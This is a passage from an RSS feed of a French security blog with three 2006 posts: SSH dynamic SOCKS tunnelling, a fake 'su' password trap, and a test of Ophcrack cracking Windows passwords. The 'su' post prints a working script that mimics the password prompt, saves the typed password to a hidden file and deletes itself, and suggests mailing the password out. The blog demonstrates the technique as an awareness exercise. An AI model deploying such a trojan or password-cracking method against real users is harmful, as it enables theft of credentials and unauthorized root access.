    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Ce billet présente l'utilisation de l'option -D de la commande ssh.&lt;br /&gt;
Pour illustrer cette option, prenons le cas ou vous êtes dans un réseau &quot;non sûr&quot; et que vous voulez surfez sans que le réseau dans lequel vous êtes puisse trop vous surveiller...&lt;br /&gt;
Prérequis: vous avez une machine chez vous en adsl sur laquelle écoute un serveur SSH (de préférence sur le port 80 ou 443 dans notre exemple) mais sur laquelle &lt;ins&gt;il n'y a pas besoin&lt;/ins&gt; d'avoir un Squid ou autre...&lt;br /&gt;
Il suffit alors de monter un tunnel SSH vers le serveur à la maison (même à travers un proxy Http) et de surfer à l'intérieur du tunnel pour sortir réellement sur le net par la ligne de la maison...&lt;/p&gt;



&lt;pre&gt;&lt;/pre&gt;

&lt;blockquote&gt;&lt;p&gt;-D port&lt;br /&gt;
Specifies a local &quot;dynamic&quot; application-level port forwarding.  This works by allocating a socket to listen to port on the local side, and whenever a connection is made to this port, the connection is forwarded over the secure channel, and the application protocol is then used to determine where to connect to from the remote machine.  Currently the SOCKS4 and SOCKS5 protocols are supported,[...]&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Le petit dessin illustrant la communication de l'exemple ci-dessous:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;http://img97.imageshack.us/img97/9317/sshdyannickavril20069sg.png&quot; alt=&quot;&quot; style=&quot;display:block; margin:0 auto;&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On lançe sur la machine client la commande SSH:&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;ssh -D 1111 -p 443 login@srvMaison&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Il suffit ensuite de configurer notre client Http (Firefox) pour utiliser un proxy Socks sur le serveur 127.0.0.1 sur le port 1111&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;http://img85.imageshack.us/img85/9505/sshdfirefoxavril20070wv.png&quot;&gt;&lt;img src=&quot;http://img85.imageshack.us/img85/9505/sshdfirefoxavril20070wv.th.png&quot; alt=&quot;&quot; style=&quot;display:block; margin:0 auto;&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Fin:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nous surfons donc sans que le réseau dans lequel nous sommes ne puisse voir les sites où nous allons...&lt;br /&gt;
...et ceci sans utiliser rien d'autre qu'un serveur SSH &quot;perso&quot;...&lt;br /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;La même chose en graphique avec putty:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;http://img84.imageshack.us/img84/6518/sshdputtyavril20062no.png&quot;&gt;&lt;img src=&quot;http://img84.imageshack.us/img84/6518/sshdputtyavril20062no.th.png&quot; alt=&quot;&quot; style=&quot;display:block; margin:0 auto;&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Et les autres applis ne pouvant pas être configurées pour utiliser un proxy SOCKS&amp;nbsp;?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;ahhhh... eh bien c'est possible aussi... et c'est l'objet du billet suivant :)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PS: Attention à la confidentialité des requètes DNS qui ne passent pas dans le tunnel...&lt;/li&gt;
&lt;/ul&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/04/22/86-tunnel-ssh-avec-l-option-d#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/04/22/86-tunnel-ssh-avec-l-option-d#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/86</wfw:commentRss>
      </item>
    
  <item>
    <title>Jouons avec ''su''</title>
    <link>http://blog.uggy.org/post/2006/04/14/84-jouons-avec-su</link>
    <guid isPermaLink="false">urn:md5:8ea984b20d3b08474c40e6d0945ae85e</guid>
    <pubDate>Fri, 14 Apr 2006 12:45:55 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Un vrai &lt;em&gt;su&lt;/em&gt; si on se trompe de mot de passe:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;[yannick@yop /tmp] su&lt;br /&gt;
Password: &lt;br /&gt;
su&amp;nbsp;: Authentication failure&lt;br /&gt;
Désolé.&lt;br /&gt;
[yannick@yop /tmp] &lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;&lt;/blockquote&gt;



&lt;p&gt;Un &lt;em&gt;su&lt;/em&gt; un peu modifié qui serait susceptible de remplacer le vrai:&lt;/p&gt;



&lt;blockquote&gt;&lt;p&gt;[yannick@yop /tmp] cat badsu &lt;br /&gt;
#!/bin/sh&lt;br /&gt;
echo  -n  &quot;Password: &quot;&lt;br /&gt;
stty  -echo&lt;br /&gt;
read  pw&lt;br /&gt;
echo  &quot;&quot;&lt;br /&gt;
echo  $pw  &amp;gt;  /tmp/.pw 2&amp;gt;/dev/null&lt;br /&gt;
stty  echo&lt;br /&gt;
echo  &quot;su: Authentication failure&quot;&lt;br /&gt;
echo  &quot;Désolé.&quot;&lt;br /&gt;
rm badsu&lt;br /&gt;
[yannick@yop /tmp]&lt;/p&gt;&lt;/blockquote&gt;




&lt;blockquote&gt;&lt;p&gt;[yannick@yop /tmp] ./badsu &lt;br /&gt;
Password: &lt;br /&gt;
su: Authentication failure&lt;br /&gt;
Désolé.&lt;br /&gt;
[yannick@yop /tmp] &lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;blockquote&gt;&lt;p&gt;[yannick@yop /tmp] cat /tmp/.pw&lt;br /&gt;
aaaaaabbbbb&lt;br /&gt;
[yannick@yop /tmp]&lt;/p&gt;&lt;/blockquote&gt;



&lt;p&gt;Après c'est sûr qu'il faut avoir été root au moins pendant 1 minute pour remplacer l'original...&lt;br /&gt;
...mais c'est pas parcequ'on est root qu'on connait forcément le mot de passe...&lt;br /&gt;
On peut améliorer le script pour envoyer un mail... ou pour lancer le vrai su avec le mot de passe.. etc..&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/04/14/84-jouons-avec-su#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/04/14/84-jouons-avec-su#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/84</wfw:commentRss>
      </item>
    
  <item>
    <title>Retrouver des mots de passe Windows en quelques secondes - Ophcrack</title>
    <link>http://blog.uggy.org/post/2006/04/13/83-retrouver-des-mots-de-passe-windows-en-quelques-secondes-ophcrack</link>
    <guid isPermaLink="false">urn:md5:46b68b859afcf5c8e552a4a1ca1f9d30</guid>
    <pubDate>Thu, 13 Apr 2006 15:48:09 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Je viens de tester le LiveCD de &lt;a href=&quot;http://ophcrack.sourceforge.net/&quot;&gt;http://ophcrack.sourceforge.net/&lt;/a&gt;&lt;/p&gt;


&lt;p&gt;Son avantage sur &lt;a href=&quot;http://en.wikipedia.org/wiki/L0phtCrack&quot;&gt;L0phtCrack&lt;/a&gt;, c'est la rapidité. (Utilisation de rainbow tables)...&lt;br /&gt;
Son avantage sur &lt;a href=&quot;http://home.eunet.no/~pnordahl/ntpasswd/&quot;&gt;The Offline NT Password Editor,&lt;/a&gt; c'est qu'il retrouve le mot de passe au lieu de juste le remplacer...&lt;br /&gt;&lt;/p&gt;


&lt;p&gt;On boote dessus, et sans rien faire, il trouve la partition Windows et la SAM, charge les tables, et commence les comparaisons...&lt;/p&gt;


&lt;p&gt;Je viens de tester sur un XP avec un mot de passe (qui n'est pas un mot du dictionnaire) composé de:&lt;br /&gt;
3 majuscules&lt;br /&gt;
2 minuscules&lt;br /&gt;
3 chiffres&lt;/p&gt;


&lt;p&gt;...il a trouvé en 2 minutes environ sur une machine à 2,8 Ghz...&lt;/p&gt;


&lt;p&gt;J'ai essayé en mettant un caractère spécial et il n'a pas trouvé la partie qui contenanait ce caractère.&lt;br /&gt;
Il semble qu'on puisse acheter une version pour avoir les caractères spéciaux etc..&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/04/13/83-retrouver-des-mots-de-passe-windows-en-quelques-secondes-ophcrack#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/04/13/83-retrouver-des-mots-de-passe-windows-en-quelques-secondes-ophcrack#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/83</wfw:commentRss>
      </item>
    
</channel>
</rss>